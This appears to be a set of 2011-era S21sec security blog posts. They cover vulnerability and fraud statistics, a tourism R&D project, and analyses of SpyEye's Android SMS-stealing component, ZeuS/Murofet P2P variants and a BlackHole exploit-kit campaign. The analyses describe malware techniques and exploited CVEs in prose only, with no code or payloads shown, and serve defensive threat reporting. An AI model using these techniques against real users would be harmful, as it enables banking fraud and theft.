S21sec detects almost 7,000 vulnerabilities en 2011

S21sec presents its first ‘Vulnerability Report’ prepared by the Ecrime team integrating the experts of the company in charge of detecting and resolving Internet offences affecting organisations 24 hours a day, 365 days a year. This report gathers the information on vulnerabilities detected by S21sec during this last decade, from 2001 to December 2011, and it intends to build an image of the main threats currently affecting companies and institutions, as well as users.

This ‘Vulnerability Report’ includes all the vulnerabilities detected during the last year. 2011 has been a year marked by the appearance of a large number of high-risk vulnerabilities and the number of vulnerabilities remained relatively constant between months, except for March. The third month of the year registered a high number of vulnerabilities on Apple software which affected a large number of their products, such as iTunes, Safari, Apple IIOS, Mac OSX and iPhones IOS, among others.

We have detected an increase of vulnerabilities during 2011, with growing remote exploitation of vulnerabilities and a sophistication of industry-oriented Trojans such as the case of Stuxnet or Duqu. However, a changing tendency can be observed in browsers where a change can be seen in the exploitation of vulnerabilities from Firefox to Chrome as the latter is reaching the highest market share.

 During this year we will still see increasing vulnerabilities to mobile devices with operating systems such as Android or iPhone OS. There are currently 5,600 million mobiles in use (around 77% of the world population has one), amongst which 468 million are Smartphones and this number is estimated to reach 631 million by 2015, thus, logically, the risk of vulnerabilities will also increase to more users and more devices.

This ‘Vulnerability Report’, prepared by the S21sec Ecrime unit, can be downloaded here.

 

S21sec

A YEAR OF FRAUD (PART I)

The New Year is the ideal time to present a summary of all that we have seen during 2011. The data that we will present here is related to fraud incidents closed by S21sec's SOC/CERT.

We have acted on 4759 fraud incidents that directly affected our clients, slightly fewer than the number recorded the previous year. The distribution of these incidents can be seen in the following graph.

Once again, the number of phishing related incidents exceeds those related to malicious code. This is mainly due to our clients in Latin America who suffered fewer malicious code incidents.

The following stack chart shows the monthly distribution of all incidents.

Two peaks in the quantity of recorded incidents can clearly be seen. This phenomenon is repeated year after year and usually occurs around holiday periods, when the users are generally more relaxed and less security conscious.

Personally, I feel 2011 has been deceptive, constantly promising major news but failing to deliver. 2010, in contrast, was a remarkable year. It brought with it both new attack methods (MitB, MitMo) and new malicious code families (Tatanga, SpyEye, etc.).

What happened in 2011?

Now that we can review 2011 in its entirety, we could consider it as a transitional year. During 2011 we have seen that the cyber-criminals improved their fraud related methods and tools, but did not introduce any notable innovations.

Could this stagnation be related to the global economic crisis?

It is hard to relate the changes in the fraud typology with economic reality, but there is no doubt that certain aspects have influenced the past few months.

Social engineering attacks, usually made by individuals (not organised), have increased considerably. The costs of preparing this kind of attack are low, which has led to many new individuals (drawn by the chance of rapid returns for minimal investment) entering the scene. This fact is particularly relevant in Latin America, the only place in the world where we have seen an increase in incidents on previous years.

On the other hand, we have the much more complex and expensive malicious code attacks. These are usually made by very well organised mafias with abundant resources. In 2011 we expected SpyEye to takeoff as ZeuS (its main rival) abandoned their development at the end of 2010 and published the source code. However, this did not occur probably because of Spyeye’s elevated price. Furthermore, we have seen how some "gangs" have instead taken advantage of the published ZeuS code to develop new families of malware without having to take on the associated costs.

David Ávila

S21sec ecrime

Tourist Periscope will manage tourist information on the We

S21sec labs is leading the project Tourist Periscope with the aim of developing the technological solution that will help the tourist sector to detect the different market opportunities and to reduce the strategic decision taking risk by predicting tourist trends.

The Internet is a source of innumerable amounts of information, which often represents a threat for a company as it cannot manage this volume of information or it could mean a business opportunity hard to detect among so much data circulating through the Net.

The exponential increase of information in the tourist sector is translated into serious difficulties for tourist companies, institutions and administrations when managing, identifying and optimising the search for contents of interest for their business.

For this reason, S21sec and thanks to its experience in the development of open-source information classification, indexing and information search technologies, will create the application Tourist Periscope in its R&D centre in security S21sec labs and in cooperation with agents specialised in the tourist sector, from both the academic and corporate environments. This R&D project is framed within the INNPACTO projects of the Ministry of Economy and Competitiveness. The new IT platform will be oriented at the tourist sector and will be able to carry out an efficient information management and rationalisation according to the profile of the client and the purpose that is to be achieved. This new tool is able to carry out analysis of the tourist environment in a customised way and integrated with social networks, generating a Tourist Intelligence unit.

The purpose of Tourist Periscope is to provide companies in the tourist sector with a new user-friendly technological solution to detect the different market opportunities and to reduce the strategic decision taking risk by being ahead of tourist behaviour.

S21sec Marketing Department

New SpyEye Campaign with mobile complement

More than a year ago we saw for the first time how ZeuS had incorporated a mobile component in an attempt to steal the SMS sent by the banks while making a transfer. Later, SpyEye incorporated the same technique.

Recently, we have seen a new campaign affecting Spanish banks, which urges the user to install a component if their phone is Android. While the first samples came from Symbian and BlackBerry, later versions incorporated Android among its objectives. The widespread use of this platform, along with the ease of developing applications for it, makes it one of the favourite objectives of malware creators.

Infection of a mobile device is not a trivial task, so the user must be tricked, through social engineering, into infecting themselves. For this reason, it is important to understand the risks, as a user who is unaware of the threat that their mobile can be infected, is completely vulnerable to this attack.

In the case in hand, upon visiting the banking entity’s website, an infected computer will try to convince the user to install an application on the mobile phone, making them believe that they are installing a program to secure communications.

Image 1: The user is asked for their phone operating system and phone number (Spanish)

Then comes the verification of the installation, asking for a activation code that the mobile displays once the application is installed.

Image 2: The user confirms an activation code received on their mobile (Spanish)

Finally, a successful installation message is displayed to the user.

Image 3: Application installed successfully – you are now protected (Spanish)

If the mobile is an Android phone, SpyEye simply informs the user that they do not require any further security.

Image 4: Your phone does not require any further security (Spanish)

Despite the fact that many times we have heard the term "SpyEye for Android" incorrectly used, we must be clear that the component that infects mobiles is not a version of SpyEye, as it is not capable of intercepting on-line banking navigation or anything similar. This is a very simple application, able to forward received SMSs to an external server using a simple GET request with the data as parameters. It is a merely a complement, totally unrelated to the malware that infects the computer and it could be used interchangeably with any banking trojan.

As an example of the application’s simplicity, the encryption of the string containing the URI of the dropzone consists solely of swapping the values "=", "-" and "q", as can be seen in the following example, very similar to the original URI.

This means that we are facing a new infection campaign which, from a technical point of view, really adds nothing new, but we must stress that people need to understand this kind of threat to avoid falling into the trap.

Mikel Gastesi

S21sec e-crime

Murofet: Changing to zlib

Time passes and in the world of malware new threats continue to emerge, but the established threats still continue to evolve and everything points to this continuing.

In this blog, we will once again talk about Zeus and, in particular, the version known as Murofet.

Around June, we discussed the different branches of Zeus. We have seen how the developers have implemented new functionality such as P2P and domain name generation in what is known as Murofet 2.0.

In one of the latest samples received, we saw how something didn’t quite fit with the usual behaviour. This was investigated in greater depth and we have discovered that certain sections, instead of being compressed with UCL, have changed to being compressed with zlib.

Image 1: Use of zlib v 1.2.5

Zeus has evolved considerably. Gone is the time when each botnet did not have its own key and encryption consisted of only a simple xor and little more. Recent developments show the creators increasing maturity. They have stopped trying to reinvent the wheel and have been incorporating already existing cryptographic algorithms, much more robust than their predecessors, something completely logical.

If we focus on the gang behind Murofet, in particular, we can see an ongoing development, distinguishing itself ever more from the official version. The changes that have been introduced, step by step, both at the internal level (in terms of the modification of characteristics in the configuration file’s encryption) and the added characteristics mentioned previously, indicate an in-depth knowledge of the subject.

In addition, we must not forget the detail that the first variant was seen before the source code leaked, which makes it clear that the group behind it have very clear objectives.

We will keep playing.

Jozsef Gegeny and Mikel Gastesi

S21sec e-crime

Murofet v2.0 (ZeuS P2P)

Following on from the previous post about the ZeuS "ACH transaction canceled" distribution campaign, we now turn to look at the distributed binary.

This is version 2.0 of the Zeus variant known as Murofet. It has come to be named ZeuS P2P, due to some of its characteristics, which make use of this technique.

Of all recent versions, this is most evolved with many modifications from the original version. It is rumoured that this version could come from original author of ZeuS, as the modifications require a deep understanding of the original work.

The relationship to the original Murofet can be clearly seen in the configuration files. They are at the same time different from those of the original ZeuS and yet similar to each other. They have new labels in some sections and an easily detectable feature, the ERCP delimiter, as shown in the following image:


In this variant the trojan uses a P2P structure to obtain the configuration file, which is an interesting modification. To do this, it uses a few incorporated IPs, firstly, and attempts to communicate with them via UDP:


Once in communication with the bots belonging to the P2P network, if a newer version is detected, this will be downloaded, using TCP and its own protocol:


If P2P communication fails, it changes to use domain name generation, as the first Murofet version did.

The storage route, both for the binary and the registry paths, are similar to previous versions, but in this version the configuration file is stored with only RC4 encryption without the XOR layer (also known as VisualEncrypt; logically, because it does not provide any security).

Similarly, there is evidence that the trojan deletes the RC4 key from memory after each use, in a clear attempt to prevent it from being detected.

Finally, the C&C server shown in the configuration file appears to be false, in a clear attempt to mislead and delay any analysis.

In summary, this is a modified version of ZeuS, with very advanced characteristics and changes aimed at protecting itself from automatic analysis of the binary and self preservation against the destruction of the network infrastructure, but without any notable functional changes.


Jozsef Gegeny & Santiago Vicente
S21sec e-crime

New ZeuS distribution campaign: ACH transaction canceled

Our team has detected a ZeuS trojan distribution by email campaign that has been running for some days. The malicious emails include a link to a supposed report about a cancelled transaction, which is actually an HTML page that loads Javascript code into the victim’s browser. This code tries to exploit different vulnerabilities in Java, Flash and PDF to install ZeuS 2.0 on the system. This is one of the latest versions of ZeuS which uses P2P as part of its infrastructure.

The subject of the emails detected so far is “ACH transaction canceled” and in the body of the mail there is information about a supposed transaction that has been cancelled. If the victim wants further information then they have to visit a link that contains a report about the transaction:

For a few seconds the victim sees a screen indicating that they must wait. Meanwhile 4 scripts, stored on different domains are loaded into user’s browser. They are little more than simple redirections towards the site where the code (that will attempt to perform the exploitation) resides.

There are currently three different domains hosting the malicious content, created on the 2nd, 6th and 9th of November and they resolve to the same IP, located in Russia. This malicious content is obfuscated Javascript code that belongs to the BlackHole exploit kit.

Once the code is “de-obfuscated”, several functions can be seen that attempt to exploit vulnerabilities in various plugins installed in the victim’s browser:

• Java (CVE-2010-3552, CVE-2010-0886)

• Flash

• PDF (CVE-2010-0188, CVE-2009-0927, CVE-2009-4324, CVE-2008-2992, CVE-2007-5659)

• Media Player

They all use the same (or very similar) shellcode, whose objective is to download and execute the malicious code in question. In the case of the analyzed shellcode, besides executing the binary, stored on the system with a .dll extension, it launches the application Regsvr32 with the parameter -s (silent mode) to try to register the DLL in the system, although the infection has already taken place (the first call to WinExec in the image below).

As mentioned before, the downloaded binary is a ZeuS (P2P version). In the second part of this post we are giving more details (behaviour, affected entities, etc.). Meanwhile update your applications and don’t click on any suspicious links.

Jose Miguel Esparza
S21sec e-crime
(Blog / Twitter)